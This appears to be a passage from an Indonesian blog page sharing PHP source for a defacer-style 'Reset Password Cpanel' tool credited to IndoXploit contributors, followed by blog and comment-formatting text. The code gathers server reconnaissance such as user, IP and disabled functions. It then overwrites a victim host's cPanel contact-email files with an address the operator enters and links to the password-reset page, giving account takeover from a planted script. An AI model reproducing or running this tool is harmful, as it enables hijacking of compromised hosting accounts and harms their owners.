    $output[] = "USER / GROUP: ".color(1, 2, usergroup()->name)."(".color(1, 2 , usergroup()->uid).") / ".color(1, 2 , usergroup()->group)."(".color(1, 2 , usergroup()->gid).")";
    $output[] = "SERVER IP   : ".color(1, 2, $GLOBALS['SERVERIP'])." <br>YOUR IP     : ".color(1, 2, $_SERVER['REMOTE_ADDR']);
    $output[] = "DISABLE FUNC: $disable_functions";
    $output[] = "SAFE MODE   : ".(@ini_get(strtoupper("safe_mode")) === "ON" ? color(1, 2, "ON") : color(1, 2, "OFF"));
    $output[] = "<hr color='lime'>" . lib_installed() . "<hr color='lime'>";
    print "<font color=gray><pre>";
  	print implode("<br>", $output);
  	print "</pre></font>";
  }

  background();
  infosistem();
  ############################
  ##Script Resetpass Cpanel ##
  ##Coded By Naufal Ardhani ##
  ## www.naufalardhani.com  ##
  ############################

  echo '<html>
      <head>
      <link rel="shortcut icon" href="https://cdn.kualo.com/website/icon_cpanel.png">

  	      <title>Reset Password Cpanel  </title>
  	      <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  <body bgcolor=gray>
  </body>
  <style type="text/css">body, a:hover {cursor: url(), url(http://cur.cursors-4u.net/games/gam-15/gam1440.gif), progress !important;}</style><img src="http://cur.cursors-4u.net/cursor.png" border="0" alt="Toad Jumping Up and Down" style="position:absolute; top: 0px; right: 0px;" /></a></style>
  <style>
  input[type="email"] {
    border: 1px solid #ddd;
    padding: 4px 8px;
  }

  input[type="email"]:focus {
    border: 1px solid #000;
  }

  input[type="submit"] {
    font-weight: bold;
    padding: 4px 8px;
    border:2px solid lime;
    background: lime;
    color:#fff;
  }
  </style>
        	</head>
       <body>
  	 <!--SCC -->
         <center>
         <br><br>
         <font color="lime" size="5"><pre><b>Masukkan Email!</b></pre></font>
  	   <div style="border: 4px solid lime;padding: 4px 2px;width: 25%;line-height: 24px;background: black;color:lime;">
  	   <br>
  	<p>
  	    <form action="#" method="post">
  	    <b> Email : </b>
  	<input type="email" name="email" style="background-color: white;font: 9pt tahoma;color:lime;" />
  	<input type="submit" name="submit" value="Send" style="style="border-radius: 6px;font: 9pt tahoma;color:lime;"/>

  	</form>
  	<br>
  	</p>
  	</div>
  	<br>
  	<font color="lime" size="5"><b><pre>Coded by Naufal Ardhani | Blog : <a href="https://naufalardhani.com">www.Naufalrdhani.com</a> </font></b></pre>
    <hr color="lime">
    <font color="lime" size="5"><pre> Thanks to :  <a href="https://www.magelang1337.com/">Magelang1337</a>   - IndoXploit </pre></font>
     </center>
      </body>
  </html>';

  echo "<font color=lime>";
  $user = get_current_user();
  $site = $_SERVER['HTTP_HOST'];
  $ips = getenv('REMOTE_ADDR');

  if(isset($_POST['submit'])){

  	$email = $_POST['email'];
  	$wr = 'email:'.$email;
  $f = fopen('/home/'.$user.'/.cpanel/contactinfo', 'w');
  fwrite($f, $wr);
  fclose($f);
  $f = fopen('/home/'.$user.'/.contactinfo', 'w');
  fwrite($f, $wr);
  fclose($f);
  $parm = "Disini : " . $site.':2083/resetpass?start=1';
  echo '<br/><center>'.$parm.'</center>';
  }
Sebenarnya masih ada banyak tools online yang tidak bisa kami tampilkan disini. jadi untuk kamu yang masih mencari Script untuk Web Tools Online. kamu bisa mengambilnya di github klik disini


Silahkan Komentar dengan bahasa yang sopan :)

  1. Untuk membuat judul komentar, gunakan <i rel="h2">Judul Komentar</i>
  2. Untuk membuat kotak catatan, <i rel="quote">catatan</i>
  3. Untuk membuat teks stabilo, <i rel="mark">mark</i>
  4. Untuk membuat teks mono, <i rel="kbd">kbd</i>
  5. Untuk membuat kode singkat, <i rel="code">shorcode</i>
  6. Untuk membuat kode panjang, <i rel="pre"><i rel="code">potongan kode</i></i>
  7. Untuk membuat teks tebal, <strong>tebal</strong> atau <b>tebal</b>
  8. Untuk membuat teks miring, <em>miring</em> atau <i>miring</i>